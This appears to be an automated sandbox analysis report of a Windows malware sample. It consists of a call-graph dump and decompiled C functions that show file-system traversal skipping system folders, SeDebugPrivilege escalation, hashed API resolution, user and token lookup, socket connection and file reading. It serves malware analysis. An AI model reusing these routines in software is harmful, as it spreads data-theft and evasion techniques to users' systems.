2 API calls 8106->8108 8107 405bba 8107->8106 8109 402b7c 2 API calls 8107->8109 8108->8113 8110 405bdd 8109->8110 8110->8106 8111 405be4 8110->8111 8112 402bab 2 API calls 8111->8112 8112->8113 8113->8086 8114 413a58 8113->8114 8115 413a63 8114->8115 8123 412245 8114->8123 8115->8123 8181 405781 8115->8181 8118 405781 4 API calls 8119 413aa0 8118->8119 8184 4057df 8119->8184 8122 405781 4 API calls 8122->8123 8137 402bab 8123->8137 8125 413bad 8124->8125 8126 404056 6 API calls 8125->8126 8128 413bb8 8125->8128 8127 413bc5 8126->8127 8127->8083 8128->8083 8130 402b7c 2 API calls 8129->8130 8131 403fcf 8130->8131 
8136 403ff4 8131->8136 8303 403b98 8131->8303 8134 403ff8 GetLastError 8135 402bab 2 API calls 8134->8135 8135->8136 8136->8083 8138 402bb4 GetProcessHeap RtlFreeHeap 8137->8138 8139 402bc6 8137->8139 8138->8139 8139->8086 8141 402b98 8140->8141 8141->8096 8143 4031f3 8142->8143 8144 403236 8142->8144 8143->8144 8147 403208 8143->8147 8153 4030a5 8144->8153 8146 403224 8149 403258 8146->8149 8151 4031e5 4 API calls 8146->8151 8159 403263 8147->8159 8149->8098 8149->8100 8150 40320d 8150->8149 8152 4030a5 4 API calls 8150->8152 8151->8149 8152->8146 8165 402ca4 8153->8165 8155 4030b0 8156 4030b5 8155->8156 8169 4030c4 8155->8169 8156->8146 8160 40326d 8159->8160 8161 402b7c 2 API calls 8160->8161 8164 4032b7 8160->8164 8162 40328c 8161->8162 8163 402b7c 2 API calls 8162->8163 8163->8164 8164->8150 8166 403079 8165->8166 8167 40307c 8166->8167 8173 40317b GetPEB 8166->8173 8167->8155 8171 4030eb 8169->8171 8170 4030c0 8170->8146 8171->8170 8175 402c03 8171->8175 8174 40319b 8173->8174 8174->8167 8176 4031e5 3 API calls 8175->8176 8177 402c15 GetProcAddress 8176->8177 8177->8170 8179 4031e5 4 API calls 8178->8179 8180 4059cb 8179->8180 8180->8107 8199 405797 8181->8199 8183 405792 8183->8118 8185 405832 8184->8185 8186 4057eb 8184->8186 8185->8122 8185->8123 8186->8185 8209 4040bb 8186->8209 8189 405839 8191 405853 8189->8191 8236 405627 8189->8236 8190 40582c 8233 403f9e 8190->8233 8247 405762 8191->8247 8197 403f9e 5 API calls 8197->8185 8200 4057a1 8199->8200 8201 4057bd 8199->8201 8200->8201 8203 4056fc 8200->8203 8201->8183 8204 405714 8203->8204 8205 402b7c 2 API calls 8204->8205 8206 405730 8205->8206 8207 402bab 2 API calls 8206->8207 8208 405752 8206->8208 8207->8208 8208->8201 8210 4031e5 4 API calls 8209->8210 8211 4040d5 CreateFileW 8210->8211 8212 4040f8 8211->8212 8213 40418d 8211->8213 8214 4031e5 4 API calls 8212->8214 8215 404183 8213->8215 8253 403c90 8213->8253 8221 404105 8214->8221 8215->8185 8215->8189 8215->8190 8218 40416d 8250 403c40 
8218->8250 8221->8218 8225 4031e5 4 API calls 8221->8225 8223 4040bb 9 API calls 8226 4041c8 8223->8226 8224 402bab 2 API calls 8224->8215 8227 404131 VirtualAlloc 8225->8227 8226->8224 8227->8218 8228 404142 8227->8228 8229 4031e5 4 API calls 8228->8229 8230 40414f ReadFile 8229->8230 8230->8218 8231 404160 8230->8231 8232 4031e5 4 API calls 8231->8232 8232->8218 8234 4031e5 4 API calls 8233->8234 8235 403fb1 VirtualFree 8234->8235 8235->8185 8237 4031e5 4 API calls 8236->8237 8238 40563a 8237->8238 8239 405872 8238->8239 8241 405881 8239->8241 8240 4058bc 8243 405797 4 API calls 8240->8243 8244 4058af 8240->8244 8241->8240 8300 4058d4 8241->8300 8243->8244 8244->8191 8246 405781 4 API calls 8246->8240 8248 405781 4 API calls 8247->8248 8249 405770 8248->8249 8249->8197 8251 4031e5 4 API calls 8250->8251 8252 403c52 FindCloseChangeNotification 8251->8252 8252->8215 8254 403ca3 8253->8254 8257 403caa 8253->8257 8280 405dc5 8254->8280 8256 404056 6 API calls 8258 403cbe 8256->8258 8257->8256 8259 403d3a 8257->8259 8260 403d2e 8258->8260 8261 403d17 8258->8261 8262 403ccf 8258->8262 8259->8215 8276 403c59 8259->8276 8260->8259 8263 402bab 2 API calls 8260->8263 8264 405b6f 6 API calls 8261->8264 8265 405b6f 6 API calls 8262->8265 8263->8259 8267 403d14 8264->8267 8266 403cdd 8265->8266 8268 405b6f 6 API calls 8266->8268 8269 402bab 2 API calls 8267->8269 8270 403cee 8268->8270 8269->8260 8270->8267 8285 403d4d 8270->8285 8273 403d0b 8275 402bab 2 API calls 8273->8275 8275->8267 8277 403c21 8276->8277 8278 4031e5 4 API calls 8277->8278 8279 403c33 8278->8279 8279->8223 8279->8226 8294 406799 8280->8294 8282 405dd5 8283 402b7c 2 API calls 8282->8283 8284 405dfe 8283->8284 8284->8257 8297 403bb7 8285->8297 8287 403cfe 8287->8273 8288 403c62 8287->8288 8289 403d4d 5 API calls 8288->8289 8290 403c6d 8289->8290 8291 403c72 8290->8291 8292 4031e5 4 API calls 8290->8292 8291->8273 8293 403c87 CreateDirectoryW 8292->8293 8293->8273 8295 4031e5 4 API calls 8294->8295 8296 
4067ad 8295->8296 8296->8282 8298 4031e5 4 API calls 8297->8298 8299 403bc9 GetFileAttributesW 8298->8299 8299->8287 8301 405797 4 API calls 8300->8301 8302 4058a8 8301->8302 8302->8244 8302->8246 8304 4031e5 4 API calls 8303->8304 8305 403baa 8304->8305 8305->8134 8305->8136 9742 40ebc6 9743 4040bb 12 API calls 9742->9743 9744 40ebdf 9743->9744 9745 40ecd7 9744->9745 9762 407795 9744->9762 9748 40eccd 9750 403f9e 5 API calls 9748->9750 9749 4056bf 2 API calls 9760 40ec12 9749->9760 9750->9745 9751 40ecb5 9752 402bab 2 API calls 9751->9752 9753 40ecbd 9752->9753 9754 413aca 4 API calls 9753->9754 9755 40ecc7 9754->9755 9757 405695 2 API calls 9755->9757 9756 407908 GetProcessHeap RtlAllocateHeap 9756->9760 9757->9748 9758 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 9758->9760 9760->9751 9760->9756 9760->9758 9761 402bab GetProcessHeap RtlFreeHeap 9760->9761 9773 412269 9760->9773 9761->9760 9764 4077ab 9762->9764 9763 4077b3 9763->9748 9763->9749 9764->9763 9780 405ae9 9764->9780 9766 4077e1 9766->9763 9767 407802 9766->9767 9768 4077f8 9766->9768 9770 402b7c 2 API calls 9767->9770 9769 402bab 2 API calls 9768->9769 9769->9763 9771 407811 9770->9771 9772 402bab 2 API calls 9771->9772 9772->9763 9796 40374e 9773->9796 9776 412299 9776->9760 9779 402bab 2 API calls 9779->9776 9781 405af7 9780->9781 9782 402b7c 2 API calls 9781->9782 9783 405b03 9782->9783 9792 405b5a 9783->9792 9793 405998 9783->9793 9785 405b21 9786 405b61 9785->9786 9787 402b7c 2 API calls 9785->9787 9788 402bab 2 API calls 9786->9788 9789 405b39 9787->9789 9788->9792 9789->9786 9790 405b40 9789->9790 9791 402bab 2 API calls 9790->9791 9791->9792 9792->9766 9794 4031e5 4 API calls 9793->9794 9795 4059ab 9794->9795 9795->9785 9797 402b7c 2 API calls 9796->9797 9798 40375f 9797->9798 9799 4031e5 4 API calls 9798->9799 9802 4037a3 9798->9802 9800 40378f 9799->9800 9801 402bab 2 API calls 9800->9801 9800->9802 9801->9802 9802->9776 9803 4037be 9802->9803 9804 4031e5 4 API calls 

                  Control-flow Graph for 00403D74 (legend: Executed / Not Executed)
                  C-Code - Quality: 85%
                  			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                  				struct _WIN32_FIND_DATAW _v596;
                  				void* __ebx;
                  				void* _t35;
                  				int _t43;
                  				void* _t52;
                  				int _t56;
                  				intOrPtr _t60;
                  				void* _t66;
                  				void* _t73;
                  				void* _t74;
                  				WCHAR* _t98;
                  				void* _t99;
                  				void* _t100;
                  				void* _t101;
                  				WCHAR* _t102;
                  				void* _t103;
                  				void* _t104;
                  
                  				L004067C4(0xa); // executed
                  				_t72 = 0;
                  				_t100 = 0x2e;
                  				_t106 = _a16;
                  				if(_a16 == 0) {
                  					L15:
                  					_push(_a8);
                  					_t98 = E00405B6F(0, L"%s\\%s", _a4);
                  					_t104 = _t103 + 0xc;
                  					if(_t98 == 0) {
                  						L30:
                  						__eflags = 0;
                  						return 0;
                  					}
                  					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
                  					_t35 = FindFirstFileW(_t98,  &_v596); // executed
                  					_t73 = _t35;
                  					if(_t73 == 0xffffffff) {
                  						L29:
                  						E00402BAB(_t98);
                  						goto L30;
                  					}
                  					L17:
                  					while(1) {
                  						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
                  							if(_v596.dwFileAttributes != 0x10) {
                  								L21:
                  								_push( &(_v596.cFileName));
                  								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
                  								_t104 = _t104 + 0xc;
                  								if(_t101 == 0) {
                  									goto L24;
                  								}
                  								if(_a12 == 0) {
                  									E00402BAB(_t98);
                  									E00403BEF(_t73);
                  									return _t101;
                  								}
                  								_a12(_t101);
                  								E00402BAB(_t101);
                  								goto L24;
                  							}
                  							_t124 = _a20;
                  							if(_a20 == 0) {
                  								goto L24;
                  							}
                  							goto L21;
                  						} else {
                  							L24:
                  							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
                  							_t43 = FindNextFileW(_t73,  &_v596); // executed
                  							if(_t43 == 0) {
                  								E00403BEF(_t73); // executed
                  								goto L29;
                  							}
                  							_t100 = 0x2e;
                  							continue;
                  						}
                  					}
                  				}
                  				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
                  				if(_t102 == 0) {
                  					L14:
                  					_t100 = 0x2e;
                  					goto L15;
                  				}
                  				E004031E5(0, 0, 0xd4f4acea, 0, 0);
                  				_t52 = FindFirstFileW(_t102,  &_v596); // executed
                  				_t74 = _t52;
                  				if(_t74 == 0xffffffff) {
                  					L13:
                  					E00402BAB(_t102);
                  					_t72 = 0;
                  					goto L14;
                  				} else {
                  					goto L3;
                  				}
                  				do {
                  					L3:
                  					if((_v596.dwFileAttributes & 0x00000010) == 0) {
                  						goto L11;
                  					}
                  					if(_a24 == 0) {
                  						L7:
                  						if(E00405D24( &(_v596.cFileName)) >= 3) {
                  							L9:
                  							_push( &(_v596.cFileName));
                  							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
                  							_t103 = _t103 + 0xc;
                  							_a16 = _t60;
                  							_t115 = _t60;
                  							if(_t60 == 0) {
                  								goto L11;
                  							}
                  							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
                  							E00402BAB(_a16);
                  							_t103 = _t103 + 0x1c;
                  							if(_t99 != 0) {
                  								E00402BAB(_t102);
                  								E00403BEF(_t74);
                  								return _t99;
                  							}
                  							goto L11;
                  						}
                  						_t66 = 0x2e;
                  						_t114 = _v596.cFileName - _t66;
                  						if(_v596.cFileName == _t66) {
                  							goto L11;
                  						}
                  						goto L9;
                  					}
                  					_push(L"Windows");
                  					if(E00405EFF( &(_v596.cFileName)) != 0) {
                  						goto L11;
                  					}
                  					_push(L"Program Files");
                  					if(E00405EFF( &(_v596.cFileName)) != 0) {
                  						goto L11;
                  					}
                  					goto L7;
                  					L11:
                  					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
                  					_t56 = FindNextFileW(_t74,  &_v596); // executed
                  				} while (_t56 != 0);
                  				E00403BEF(_t74); // executed
                  				goto L13;
                  			}





















                  APIs
                  • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                  • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                  • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                  • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmp
                  Similarity
                  • API ID: FileFind$FirstNext
                  • String ID: %s\%s$%s\*$Program Files$Windows
                  • API String ID: 1690352074-2009209621
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 78%
                  			E0040650A(void* __eax, void* __ebx, void* __eflags) {
                  				void* _v8;
                  				struct _LUID _v16;
                  				intOrPtr _v20;
                  				intOrPtr _v24;
                  				struct _TOKEN_PRIVILEGES _v32;
                  				intOrPtr* _t13;
                  				void* _t14;
                  				int _t16;
                  				int _t31;
                  				void* _t32;
                  
                  				_t31 = 0;
                  				E004060AC();
                  				_t32 = __eax;
                  				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
                  				_t14 =  *_t13(_t32, 0x28,  &_v8);
                  				if(_t14 != 0) {
                  					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
                  					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
                  					if(_t16 != 0) {
                  						_push(__ebx);
                  						_v32.Privileges = _v16.LowPart;
                  						_v32.PrivilegeCount = 1;
                  						_v24 = _v16.HighPart;
                  						_v20 = 2;
                  						E004031E5(1, 9, 0xc1642df2, 0, 0);
                  						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
                  						_t31 =  !=  ? 1 : 0;
                  					}
                  					E00403C40(_v8);
                  					return _t31;
                  				}
                  				return _t14;
                  			}














                  APIs
                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                  • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                  Similarity
                  • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                  • String ID: SeDebugPrivilege
                  • API String ID: 3615134276-2896544425
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00402B7C(long _a4) {
                  				void* _t4;
                  				void* _t7;
                  
                  				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
                  				_t7 = _t4;
                  				if(_t7 != 0) {
                  					E00402B4E(_t7, 0, _a4);
                  				}
                  				return _t7;
                  			}






                  APIs
                  • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                  • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                  Similarity
                  • API ID: Heap$AllocateProcess
                  • API String ID: 1357844191-0
                  • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00406069(WCHAR* _a4, DWORD* _a8) {
                  				int _t4;
                  				void* _t5;
                  
                  				E004031E5(_t5, 9, 0xd4449184, 0, 0);
                  				_t4 = GetUserNameW(_a4, _a8); // executed
                  				return _t4;
                  			}






                  APIs
                  • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                  Similarity
                  • API ID: NameUser
                  • API String ID: 2645101109-0
                  • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: recv
                  • String ID:
                  • API String ID: 1507349165-0
                  • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                  • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                  • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                  • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 223 4061c3-4061f2 call 402bf2 call 4031e5 229 4061f4-4061ff GetLastError 223->229 230 40622a-40623b call 402b7c 223->230 231 406201-406203 229->231 232 406208-406228 call 4060ac call 4031e5 229->232 238 40624c-406258 call 402b7c 230->238 239 40623d-406249 call 40338c 230->239 234 406329-40632e 231->234 232->230 232->231 246 406269-406290 call 4031e5 GetTokenInformation 238->246 247 40625a-406266 call 40338c 238->247 239->238 253 406292-4062a0 call 402b7c 246->253 254 4062fe-406302 246->254 247->246 253->254 265 4062a2-4062b9 call 406086 253->265 256 406304-406307 call 403c40 254->256 257 40630d-40630f 254->257 266 40630c 256->266 258 406311-406317 call 402bab 257->258 259 406318-40631e 257->259 258->259 263 406320-406326 call 402bab 259->263 264 406327 259->264 263->264 264->234 272 4062f5-4062fd call 402bab 265->272 273 4062bb-4062df call 4031e5 265->273 266->257 272->254 278 4062e2-4062e4 273->278 278->272 279 4062e6-4062f3 call 405b6f 278->279 279->272
                  C-Code - Quality: 75%
                  			E004061C3(void* __eax, void* __ebx, void* __eflags) {
                  				int _v8;
                  				long _v12;
                  				int _v16;
                  				int _v20;
                  				char _v24;
                  				char _v28;
                  				char _v32;
                  				intOrPtr* _t25;
                  				int _t27;
                  				int _t30;
                  				int _t31;
                  				int _t36;
                  				int _t37;
                  				intOrPtr* _t39;
                  				int _t40;
                  				long _t44;
                  				intOrPtr* _t45;
                  				int _t46;
                  				void* _t48;
                  				int _t49;
                  				void* _t67;
                  				void* _t68;
                  				void* _t74;
                  
                  				_t48 = __ebx;
                  				_t67 = 0;
                  				_v8 = 0;
                  				E00402BF2();
                  				_t68 = __eax;
                  				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
                  				_t2 =  &_v8; // 0x414449
                  				_push(1);
                  				_push(8);
                  				_push(_t68);
                  				if( *_t25() != 0) {
                  					L4:
                  					_t27 = E00402B7C(0x208);
                  					_v20 = _t27;
                  					__eflags = _t27;
                  					if(_t27 != 0) {
                  						E0040338C(_t27, _t67, 0x104);
                  						_t74 = _t74 + 0xc;
                  					}
                  					_push(_t48);
                  					_t49 = E00402B7C(0x208);
                  					__eflags = _t49;
                  					if(_t49 != 0) {
                  						E0040338C(_t49, _t67, 0x104);
                  						_t74 = _t74 + 0xc;
                  					}
                  					_v28 = 0x208;
                  					_v24 = 0x208;
                  					_t7 =  &_v8; // 0x414449
                  					_v12 = _t67;
                  					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
                  					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
                  					__eflags = _t30;
                  					if(_t30 == 0) {
                  						_t36 = E00402B7C(_v12);
                  						_v16 = _t36;
                  						__eflags = _t36;
                  						if(_t36 != 0) {
                  							_t14 =  &_v8; // 0x414449, executed
                  							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
                  							__eflags = _t37;
                  							if(_t37 != 0) {
                  								_t39 = E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
                  								_t40 =  *_t39(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
                  								__eflags = _t40;
                  								if(__eflags != 0) {
                  									_t67 = E00405B6F(__eflags, L"%s", _t49);
                  								}
                  							}
                  							E00402BAB(_v16);
                  						}
                  					}
                  					__eflags = _v8;
                  					if(_v8 != 0) {
                  						E00403C40(_v8); // executed
                  					}
                  					__eflags = _t49;
                  					if(_t49 != 0) {
                  						E00402BAB(_t49);
                  					}
                  					_t31 = _v20;
                  					__eflags = _t31;
                  					if(_t31 != 0) {
                  						E00402BAB(_t31);
                  					}
                  					return _t67;
                  				}
                  				_t44 = GetLastError();
                  				if(_t44 == 0x3f0) {
                  					E004060AC();
                  					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
                  					_t3 =  &_v8; // 0x414449
                  					_t46 =  *_t45(_t44, 8, _t3);
                  					__eflags = _t46;
                  					if(_t46 == 0) {
                  						goto L2;
                  					}
                  					goto L4;
                  				}
                  				L2:
                  				return 0;
                  			}



























                  APIs
                  • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                  • _wmemset.LIBCMT ref: 00406244
                  • _wmemset.LIBCMT ref: 00406261
                  • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: _wmemset$ErrorInformationLastToken
                  • String ID: IDA$IDA
                  • API String ID: 487585393-2020647798
                  • Opcode ID: 09bc94978ef0cfa67adb0dd1c358d24fc5aa727ab36273feac3f2f200d8d5874
                  • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                  • Opcode Fuzzy Hash: 09bc94978ef0cfa67adb0dd1c358d24fc5aa727ab36273feac3f2f200d8d5874
                  • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 536 404e17-404e57 getaddrinfo 537 404e59-404e5b 536->537 538 404e5d-404e84 call 402b7c socket 536->538 539 404ecf-404ed3 537->539 542 404e86-404e96 call 402bab freeaddrinfo 538->542 543 404e98-404ea7 connect 538->543 552 404ec7-404ec9 542->552 545 404eb3-404ebe freeaddrinfo 543->545 546 404ea9-404eb1 call 404de5 543->546 549 404ec0-404ec6 call 402bab 545->549 550 404ecb 545->550 546->545 549->552 551 404ecd-404ece 550->551 551->539 552->551
                  C-Code - Quality: 37%
                  			E00404E17(intOrPtr _a4, intOrPtr _a8) {
                  				signed int _v8;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v36;
                  				void _v40;
                  				void* _t23;
                  				signed int _t24;
                  				signed int* _t25;
                  				signed int _t30;
                  				signed int _t31;
                  				signed int _t33;
                  				signed int _t41;
                  				void* _t42;
                  				signed int* _t43;
                  
                  				_v8 = _v8 & 0x00000000;
                  				_t33 = 8;
                  				memset( &_v40, 0, _t33 << 2);
                  				_v32 = 1;
                  				_t23 =  &_v40;
                  				_v28 = 6;
                  				_v36 = 2;
                  				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
                  				if(_t23 == 0) {
                  					_t24 = E00402B7C(4);
                  					_t43 = _t24;
                  					_t31 = _t30 | 0xffffffff;
                  					 *_t43 = _t31;
                  					_t41 = _v8;
                  					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
                  					 *_t43 = _t24;
                  					if(_t24 != _t31) {
                  						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
                  						if(_t24 == _t31) {
                  							E00404DE5(_t24,  *_t43);
                  							 *_t43 = _t31;
                  						}
                  						__imp__freeaddrinfo(_v8);
                  						if( *_t43 != _t31) {
                  							_t25 = _t43;
                  							goto L10;
                  						} else {
                  							E00402BAB(_t43);
                  							L8:
                  							_t25 = 0;
                  							L10:
                  							return _t25;
                  						}
                  					}
                  					E00402BAB(_t43);
                  					__imp__freeaddrinfo(_v8);
                  					goto L8;
                  				}
                  				return 0;
                  			}


















                  APIs
                  • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                  • socket.WS2_32(?,?,?), ref: 00404E7A
                  • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: freeaddrinfogetaddrinfosocket
                  • String ID:
                  • API String ID: 2479546573-0
                  • Opcode ID: cd1e8287def8bd693109279cc7574c8e7d85880b1aeaf44ebe350a6b8523ff17
                  • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                  • Opcode Fuzzy Hash: cd1e8287def8bd693109279cc7574c8e7d85880b1aeaf44ebe350a6b8523ff17
                  • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 556 4040bb-4040f2 call 4031e5 CreateFileW 559 4040f8-404111 call 4031e5 556->559 560 40418d-404190 556->560 570 404113-404119 559->570 571 40417a 559->571 562 404192-4041a7 call 403c90 560->562 563 404184 560->563 562->563 569 4041a9-4041b8 call 403c59 562->569 565 404186-40418c 563->565 576 4041ba-4041d8 call 4040bb call 403d44 569->576 577 4041db-4041e4 call 402bab 569->577 570->571 575 40411b-404120 570->575 574 40417d-40417e call 403c40 571->574 583 404183 574->583 579 404122 575->579 580 404124-404140 call 4031e5 VirtualAlloc 575->580 576->577 577->565 579->580 580->571 589 404142-40415e call 4031e5 ReadFile 580->589 583->563 589->574 593 404160-404178 call 4031e5 589->593 593->574
                  C-Code - Quality: 74%
                  			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
                  				struct _SECURITY_ATTRIBUTES* _v8;
                  				char _v12;
                  				long _v16;
                  				void* __ebx;
                  				void* __edi;
                  				void* _t16;
                  				intOrPtr* _t25;
                  				long* _t28;
                  				void* _t30;
                  				int _t32;
                  				intOrPtr* _t33;
                  				void* _t35;
                  				void* _t42;
                  				intOrPtr _t43;
                  				long _t44;
                  				struct _OVERLAPPED* _t46;
                  
                  				_t46 = 0;
                  				_t35 = 0;
                  				E004031E5(0, 0, 0xe9fabb88, 0, 0);
                  				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                  				_t42 = _t16;
                  				_v8 = _t42;
                  				if(_t42 == 0xffffffff) {
                  					__eflags = _a12;
                  					if(_a12 == 0) {
                  						L10:
                  						return _t35;
                  					}
                  					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
                  					__eflags = _t43;
                  					if(_t43 == 0) {
                  						goto L10;
                  					}
                  					_push(0);
                  					__eflags = E00403C59(_a4, _t43);
                  					if(__eflags != 0) {
                  						_v8 = 0;
                  						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
                  						_push(_t43);
                  						 *_a8 = _v8;
                  						E00403D44();
                  					}
                  					E00402BAB(_t43);
                  					return _t46;
                  				}
                  				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
                  				_t44 =  *_t25(_t42,  &_v12);
                  				if(_v12 != 0 || _t44 > 0x40000000) {
                  					L8:
                  					_t45 = _v8;
                  					goto L9;
                  				} else {
                  					_t28 = _a8;
                  					if(_t28 != 0) {
                  						 *_t28 = _t44;
                  					}
                  					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
                  					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
                  					_t35 = _t30;
                  					if(_t35 == 0) {
                  						goto L8;
                  					} else {
                  						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
                  						_t45 = _v8;
                  						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
                  						if(_t32 == 0) {
                  							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
                  							 *_t33(_t35, _t46, 0x8000);
                  							_t35 = _t46;
                  						}
                  						L9:
                  						E00403C40(_t45); // executed
                  						goto L10;
                  					}
                  				}
                  			}




















                  APIs
                  • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                  • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                  Strings
                  Memory Dump Source
